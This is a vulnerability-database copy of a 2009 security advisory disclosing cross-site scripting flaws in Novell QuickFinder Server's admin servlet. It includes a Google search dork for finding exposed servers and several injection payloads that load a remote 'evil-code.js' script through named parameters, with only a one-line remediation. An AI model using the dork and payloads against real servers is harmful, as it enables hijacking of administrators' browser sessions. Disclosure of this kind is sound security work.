Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIvan SanchezPACKETSTORM:74795
HistoryFeb 09, 2009 - 12:00 a.m.

Novell-QuickFinder Server XSS

2009-02-0900:00:00
Ivan Sanchez
packetstormsecurity.com
29
JSON
` NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+================================================================================================================================+  
+ Novell-QuickFinder Server //Cross-site scripting (XSS) Remote Java Execution Code +  
+================================================================================================================================+  
  
  
Author(s): Ivan Sanchez   
  
http://www.novell.com/products/openenterpriseserver/quickfinder.html  
  
Date: 10/02/2009  
  
  
Overview  
--------  
  
If your company's Web site is like most, it's not lacking in information. While your site's visitors have access to massive amounts of data, they may benefit from a faster,   
more efficient way to pinpoint what they're looking for: QuickFinder Server (formerly NetWareยฎ Web Search) from Novell.  
  
Unlike all-Web search engines, QuickFinder is targeted at the Enterprise. General Internet search engines index many Web sites and their component pages, but they either cannot or do not index all available content. Perhaps that's the reason more than 75 percent of Web-site visitors use site-specific search functionality when it's available to them. In fact, for many Web sites, the search-results page has more hits than does the home page.   
Yet more than 50 percent of large Web sites (over 500,000 pages) and 70 percent of moderately sized Web sites (up to 5,000 pages) do not offer search functionality to their visitors.   
  
"  
Today I was checking a lot parameters,"POST" we have a lot of them to be exploited.  
So I have posted some, but we have much more.   
cheers !!! "  
  
GOOGLE DORKS:  
------------  
  
Google Search: inurl:"/NSearch/AdminServlet"   
  
  
  
Parameter Affected over http/https:  
-----------------------------------  
  
  
  
  
"add virtual server"  
  
https://server:2200/qfsearch/AdminServlet?&req=displayaddsite  
  
Post:  
siteloc=%22%3E%3Cscript%20src=http://nullcode.com.ar/scripts/evil-code.js%3E%3C/script%3E  
  
"Default"  
  
Post:  
https://server:2200/qfsearch/AdminServlet?site=globalsearchsite&req=generalproperties  
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>  
  
"services, synchronization"  
  
Post:  
https://server:2200/qfsearch/AdminServlet?&req=clusterserviceproperties  
site="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>  
  
  
Querystring:  
  
https://server2200/qfsearch/AdminServlet?&req=global&adminurl="><script src=http://www.nullcode.com.ar/scripts/evil-code.js></script>  
  
  
Much more parameters have been affected.("print-list")  
  
  
  
Remediation: Validate the Input.   
------------  
  
  
  
  
  
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!  
+================================================================================================================================+  
+ Novell-QuickFinder Server //Cross-site scripting (XSS) Remote Java Execution Code +  
+================================================================================================================================+  
  
  
`
JSON